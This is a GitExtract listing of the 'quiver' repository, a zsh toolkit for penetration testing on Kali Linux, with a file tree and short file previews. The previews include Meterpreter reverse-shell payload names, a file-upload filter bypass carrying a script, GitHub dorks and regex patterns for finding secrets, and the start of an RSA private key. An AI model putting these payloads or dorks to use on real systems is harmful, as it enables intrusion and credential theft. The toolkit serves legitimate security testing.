│ ├── qq-shell-handlers.zsh
│ ├── qq-shell-tty.zsh
│ ├── qq-srv.zsh
│ ├── qq-vars-global.zsh
│ ├── qq-vars.zsh
│ └── qq.zsh
├── payloads/
│ ├── aka.ms.pem
│ ├── aliases.rc
│ ├── github-dorks-commits.txt
│ ├── msf-windows-payloads.txt
│ ├── recon-dorks-github.txt
│ ├── recon-dorks-google.txt
│ ├── resolvers.txt
│ ├── secrets-content.json
│ ├── secrets-files.json
│ ├── tcp-ports.txt
│ ├── user-agents.txt
│ ├── web-file-upload-bypass-bytes.txt
│ ├── web-file-upload-bypass.txt
│ ├── wordlist-api.txt
│ └── wordlists.txt
├── quiver.code-workspace
├── quiver.plugin.zsh
├── scripts/
│ ├── dns-reverse-brute.zsh
│ ├── image-gen.js
│ ├── recon.zsh
│ ├── webrecon.zsh
│ ├── wildcards.py
│ └── wildcards.sh
└── system/
└── hidpi.sh
SYMBOL INDEX (8 symbols across 2 files)
FILE: scripts/image-gen.js
function encode (line 2) | function encode(a) {
function encode (line 43) | function encode(a) {
FILE: scripts/wildcards.py
function print_red (line 28) | def print_red(skk): print("\033[91m{}\033[00m" .format(skk))
function print_cyan (line 29) | def print_cyan(skk): print("\033[96m{}\033[00m" .format(skk))
function print_yellow (line 30) | def print_yellow(skk): print("\033[93m{}\033[00m" .format(skk))
function download_file_from_url (line 34) | def download_file_from_url(url, file):
function read_domains_from_file (line 48) | def read_domains_from_file(file):
function main (line 61) | def main():
Condensed preview — 76 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (198K chars).
[
{
"path": ".gitattributes",
"chars": 66,
"preview": "# Auto detect text files and perform LF normalization\n* text=auto\n"
},
{
"path": ".gitignore",
"chars": 95,
"preview": "\n# ignore qq-custom.zsh module\nmodules/qq-custom.zsh\nlog.txt\nremote_checked.txt\nremote_ver.txt\n"
},
{
"path": ".vscode/settings.json",
"chars": 41,
"preview": "{\n \"editor.detectIndentation\": false\n}"
},
{
"path": "LICENSE",
"chars": 1071,
"preview": "MIT License\n\nCopyright (c) 2020 Steve McIlwain\n\nPermission is hereby granted, free of charge, to any person obtaining a "
},
{
"path": "README.md",
"chars": 5070,
"preview": "# Quiver : A Meta-Tool for Kali Linux\n\nQuiver is an organized namespace of shell functions that pre-fill commands in you"
},
{
"path": "RELEASES.md",
"chars": 3019,
"preview": "# Releases\n\n## 1.0 6/4/2020\n\nComplete refactor and reorganization, including:\n\n* Added qq-<namespace>-help commands to a"
},
{
"path": "VERSION",
"chars": 5,
"preview": "1.0.0"
},
{
"path": "modules/qq-encoding.zsh",
"chars": 936,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-encoding\n#######################"
},
{
"path": "modules/qq-enum-dhcp.zsh",
"chars": 1124,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-dhcp\n######################"
},
{
"path": "modules/qq-enum-dns.zsh",
"chars": 2958,
"preview": "#!/usr/bin/env zsh\n \n############################################################# \n# qq-enum-dns\n######################"
},
{
"path": "modules/qq-enum-ftp.zsh",
"chars": 1782,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-ftp\n#######################"
},
{
"path": "modules/qq-enum-host.zsh",
"chars": 2905,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-host\n######################"
},
{
"path": "modules/qq-enum-kerb.zsh",
"chars": 1700,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-kerb\n######################"
},
{
"path": "modules/qq-enum-ldap.zsh",
"chars": 2610,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-ldap\n######################"
},
{
"path": "modules/qq-enum-mssql.zsh",
"chars": 1805,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-mssql\n#####################"
},
{
"path": "modules/qq-enum-mysql.zsh",
"chars": 1747,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-mmysql\n####################"
},
{
"path": "modules/qq-enum-network.zsh",
"chars": 3464,
"preview": "#!/usr/bin/env zsh\n \n############################################################# \n# qq-enum-network\n##################"
},
{
"path": "modules/qq-enum-nfs.zsh",
"chars": 1368,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-nfs\n#######################"
},
{
"path": "modules/qq-enum-oracle.zsh",
"chars": 3491,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-oracle\n####################"
},
{
"path": "modules/qq-enum-pop3.zsh",
"chars": 1227,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-pop3\n######################"
},
{
"path": "modules/qq-enum-rdp.zsh",
"chars": 2304,
"preview": "#!/usr/bin/env zsh\n\n#############################################################\n# qq-enum-rdp\n########################"
},
{
"path": "modules/qq-enum-smb.zsh",
"chars": 3331,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-smb\n#######################"
},
{
"path": "modules/qq-enum-web-aws.zsh",
"chars": 1268,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-aws\n###################"
},
{
"path": "modules/qq-enum-web-dirs.zsh",
"chars": 2127,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-dirs\n##################"
},
{
"path": "modules/qq-enum-web-eslastic.zsh",
"chars": 1860,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-elastic\n###############"
},
{
"path": "modules/qq-enum-web-fuzz.zsh",
"chars": 3303,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-fuzz\n##################"
},
{
"path": "modules/qq-enum-web-js.zsh",
"chars": 1901,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-js\n####################"
},
{
"path": "modules/qq-enum-web-php.zsh",
"chars": 3496,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-php\n###################"
},
{
"path": "modules/qq-enum-web-ssl.zsh",
"chars": 2254,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-ssl\n###################"
},
{
"path": "modules/qq-enum-web-vuln.zsh",
"chars": 2532,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-vuln\n##################"
},
{
"path": "modules/qq-enum-web.zsh",
"chars": 3297,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web\n#######################"
},
{
"path": "modules/qq-exploit.zsh",
"chars": 2977,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-exploit\n########################"
},
{
"path": "modules/qq-install.zsh",
"chars": 9309,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-install\n########################"
},
{
"path": "modules/qq-kali.zsh",
"chars": 5987,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-kali\n###########################"
},
{
"path": "modules/qq-log.zsh",
"chars": 1396,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-log\n############################"
},
{
"path": "modules/qq-notes.zsh",
"chars": 1644,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-notes\n##########################"
},
{
"path": "modules/qq-pivot.zsh",
"chars": 1493,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-pivot\n##########################"
},
{
"path": "modules/qq-project-custom.zsh",
"chars": 3922,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-project-custom\n#################"
},
{
"path": "modules/qq-project.zsh",
"chars": 3220,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-project\n########################"
},
{
"path": "modules/qq-recon-domains.zsh",
"chars": 1261,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-recon-domains\n##################"
},
{
"path": "modules/qq-recon-github.zsh",
"chars": 1853,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-recon-github\n###################"
},
{
"path": "modules/qq-recon-networks.zsh",
"chars": 1659,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-recon-networks\n#################"
},
{
"path": "modules/qq-recon-org.zsh",
"chars": 1715,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-recon-org\n######################"
},
{
"path": "modules/qq-recon-subs.zsh",
"chars": 4508,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-recon-subs\n#####################"
},
{
"path": "modules/qq-scripts.zsh",
"chars": 916,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-scripts\n########################"
},
{
"path": "modules/qq-shell-handlers-msf.zsh",
"chars": 1417,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-shell-handlers-msf\n#############"
},
{
"path": "modules/qq-shell-handlers.zsh",
"chars": 1121,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-shell-handlers\n#################"
},
{
"path": "modules/qq-shell-tty.zsh",
"chars": 1546,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-shell-tty\n######################"
},
{
"path": "modules/qq-srv.zsh",
"chars": 3396,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-srv\n############################"
},
{
"path": "modules/qq-vars-global.zsh",
"chars": 6542,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-vars-global\n####################"
},
{
"path": "modules/qq-vars.zsh",
"chars": 8060,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-vars\n###########################"
},
{
"path": "modules/qq.zsh",
"chars": 6742,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# qq\n################################"
},
{
"path": "payloads/aka.ms.pem",
"chars": 1912,
"preview": "-----BEGIN RSA PRIVATE KEY-----\nMIICXAIBAAKBgQC2E+hNdtXUWpcB4qJz+afQmZNUB7V6gFViEejmU9SXuOirAVLl\nQ1cz2xwkyCb+xyGpEC51O4H"
},
{
"path": "payloads/aliases.rc",
"chars": 1202,
"preview": "\n#nav\nalias cd..=\"cd ../\"\nalias cls=\"clear\"\nalias path=\"echo -e \\${PATH//:/\\\\n}\"\nalias cp=\"cp -iv\"\nalias mv=\"mv -iv\"\nali"
},
{
"path": "payloads/github-dorks-commits.txt",
"chars": 2261,
"preview": " \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n \"RSA private key\": \"-----BEGIN RSA P"
},
{
"path": "payloads/msf-windows-payloads.txt",
"chars": 390,
"preview": "windows/x64/meterpreter/reverse_http\nwindows/x64/meterpreter/reverse_https\nwindows/x64/meterpreter/reverse_named_pipe\nwi"
},
{
"path": "payloads/recon-dorks-github.txt",
"chars": 2262,
"preview": "filename:constants\nfilename:settings\nfilename:database\nfilename:config\nfilename:environment\nfilename:spec\nfilename:zhrc\n"
},
{
"path": "payloads/recon-dorks-google.txt",
"chars": 0,
"preview": ""
},
{
"path": "payloads/resolvers.txt",
"chars": 511,
"preview": "1.1.1.1\n1.0.0.1\n8.8.8.8\n8.8.4.4\n208.67.222.222\n208.67.220.220\n64.6.64.6\n64.6.65.6\n84.200.69.80\n84.200.70.40\n205.171.3.66"
},
{
"path": "payloads/secrets-content.json",
"chars": 2632,
"preview": "{\n \"flags\": \"-HnriE\",\n \"patterns\": [\n \"[a-z0-9.-]+\\\\.s3\\\\.amazonaws\\\\.com\",\n \"[a-z0-9.-]+\\\\.s3-[a-z0"
},
{
"path": "payloads/secrets-files.json",
"chars": 3148,
"preview": "{\n \"flags\": \"-HnriE\",\n \"patterns\": [\n \"database\",\n \"settings\",\n \"database\",\n \"config\","
},
{
"path": "payloads/tcp-ports.txt",
"chars": 198,
"preview": "21,22,25,80,88,161,443,445,744,1433,1521,2075,2076,3000,3306,3366,3389,3868,4000,4040,4044,4443,5000,5432,5900,6000,6443"
},
{
"path": "payloads/user-agents.txt",
"chars": 286,
"preview": "Googlebot/2.1 (+http://www.google.com/bot.html)\nMozilla/5.0\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
},
{
"path": "payloads/web-file-upload-bypass-bytes.txt",
"chars": 82,
"preview": "JPEG - FF D8 FF DB - ÿØÿÛ \nGIF - 47 49 46 38 - GIF8\nPNG - 89 50 4E 47 - ‰PNG\n"
},
{
"path": "payloads/web-file-upload-bypass.txt",
"chars": 145,
"preview": "Content-Disposition: form-data; name=\"upload\"; filename=\"badfile.''gif\"\nContent-Type: image/png\n\nGIF8\n<html><script>aler"
},
{
"path": "payloads/wordlist-api.txt",
"chars": 2406,
"preview": "0\n1\n2\n3\naccelerate\naccept\naccount\naccounts\nacquire\nactivate\nactive\nadapt\nadd\naddress-check\nadjust\nadmin\nalert\namount\nann"
},
{
"path": "payloads/wordlists.txt",
"chars": 454,
"preview": "/usr/share/seclists/Discovery/Web-Content/quickhits.txt\n/usr/share/seclists/Discovery/Web-Content/common.txt\n/usr/share/"
},
{
"path": "quiver.code-workspace",
"chars": 70,
"preview": "{\n \"folders\": [\n {\n \"path\": \".\"\n }\n ]\n}"
},
{
"path": "quiver.plugin.zsh",
"chars": 2920,
"preview": "#!/usr/bin/env zsh\n\nautoload colors; colors\n\n############################################################# \n# quiver\n# A"
},
{
"path": "scripts/dns-reverse-brute.zsh",
"chars": 433,
"preview": "#!/usr/bin/env zsh\n\n############################################################# \n# dns-reverse-brute\n#################"
},
{
"path": "scripts/image-gen.js",
"chars": 15909,
"preview": "(function() {\n function encode(a) {\n if (a.length) {\n var c = a.length,\n e = Math.ce"
},
{
"path": "scripts/recon.zsh",
"chars": 5715,
"preview": "#!/usr/bin/env zsh\n\n#continue on errors\nset +e \n\nautoload colors; colors\n\n__info() echo \"$fg[blue][*] $@ $reset_color\"\n_"
},
{
"path": "scripts/webrecon.zsh",
"chars": 2678,
"preview": "red=`tput setaf 1`\ngreen=`tput setaf 2`\nyellow=`tput setaf 3`\nreset=`tput sgr0`\n\necho -e \"[*] webrecon.zsh \"\necho -e \"[*"
},
{
"path": "scripts/wildcards.py",
"chars": 2125,
"preview": "#!/usr/bin/env python3\n# coding=utf-8\n\n# *******************************************************************\n# *** Wildc"
},
{
"path": "scripts/wildcards.sh",
"chars": 1276,
"preview": "#!/usr/bin/env bash\n\n#############################################################\n# wildcards.sh\n#\n# This script is int"
},
{
"path": "system/hidpi.sh",
"chars": 254,
"preview": "#!/usr/bin/env bash\n\nxfconf-query -c xfwm4 -p /general/theme -s Kali-Dark-xHiDPI\nxfconf-query -c xsettings -p /Gdk/Windo"
}
]
About this extraction
This page contains the full source code of the stevemcilwain/quiver GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 76 files (179.8 KB), approximately 56.5k tokens, and a symbol index with 8 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.